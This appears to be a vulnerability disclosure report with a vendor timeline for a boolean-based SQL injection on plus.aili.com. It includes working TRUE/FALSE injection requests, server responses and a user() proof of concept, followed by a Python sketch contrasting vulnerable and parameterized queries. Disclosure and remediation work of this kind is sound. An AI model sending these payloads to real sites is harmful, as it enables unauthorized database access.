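2015-02-28: Details reported to the vendor; awaiting vendor handling
2015-02-28: Vendor confirmed; details disclosed to the vendor only
2015-03-10: Details disclosed to core white hats and experts in related fields
2015-03-20: Details disclosed to regular white hats
2015-03-30: Details disclosed to trainee white hats
2015-04-14: Details disclosed to the public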
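Site: plus.aili.com
This is an OR-based injection in the colu parameter. A response that returns all the data means true; an empty JSON response means false.
TRUE: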
GET /topicLab/index.php?m=ForumSearch&colu=200471820820%20or%202237%3d2237&callback=jsonp1424483691772 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://club.aili.com/lifestyle/
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: plus.aili.com
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 21 Feb 2015 01:58:00 GMT
Server: By AILI/3.3
Content-Type: text/html; charset=gbk
X-Powered-By: PHP/5.2.14p1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Via: 1.1 jsycdx96:4 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 181689
FALSE:
GET /topicLab/index.php?m=ForumSearch&colu=200471820820%20or%202237%3d2238&callback=jsonp1424483691772 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://club.aili.com/lifestyle/
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: plus.aili.com
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 21 Feb 2015 01:58:01 GMT
Server: By AILI/3.3
Content-Type: text/html; charset=gbk
X-Powered-By: PHP/5.2.14p1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Via: 1.1 jsycdx96:4 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 22

jsonp1424483691772([])
POC:user()='[email protected]'
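
The TRUE/FALSE difference above comes from a numeric parameter being concatenated into the query unquoted. As an added example (not code from the report or from the site; the `topics` table, its columns and the function names are assumptions, with SQLite standing in for the real database), the sketch below reproduces that response difference and shows it disappearing once the value is validated and bound:

```python
import json
import re
import sqlite3

# Decoded from the TRUE and FALSE requests shown on the page.
TRUE_PROBE = "200471820820 or 2237=2237"
FALSE_PROBE = "200471820820 or 2237=2238"

def make_db():
    # Constructed sample data; the schema is an assumption for this example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE topics (colu INTEGER, title TEXT)")
    db.executemany("INSERT INTO topics VALUES (?, ?)",
                   [(1001, "travel"), (1002, "food"), (1003, "fashion")])
    return db

def jsonp(rows, callback="jsonp1"):
    return "%s(%s)" % (callback, json.dumps(rows))

def search_vulnerable(db, colu):
    # Unquoted numeric parameter concatenated into the statement:
    # anything after the number is parsed as SQL.
    sql = "SELECT title FROM topics WHERE colu = " + colu + " ORDER BY colu"
    return jsonp([r[0] for r in db.execute(sql)])

def search_hardened(db, colu):
    # Reject anything that is not a plain decimal id, then bind it as a value.
    if not re.fullmatch(r"[0-9]{1,18}", colu):
        return jsonp([])
    sql = "SELECT title FROM topics WHERE colu = ? ORDER BY colu"
    return jsonp([r[0] for r in db.execute(sql, (int(colu),))])

def leaks_boolean(search, db):
    # True when the two probes produce distinguishable responses.
    return search(db, TRUE_PROBE) != search(db, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_hardened):
        print(fn.__name__, "boolean oracle:", leaks_boolean(fn, db))
```
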
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-02-28 18:09
Protecting the underpants starts with my mount...
None yet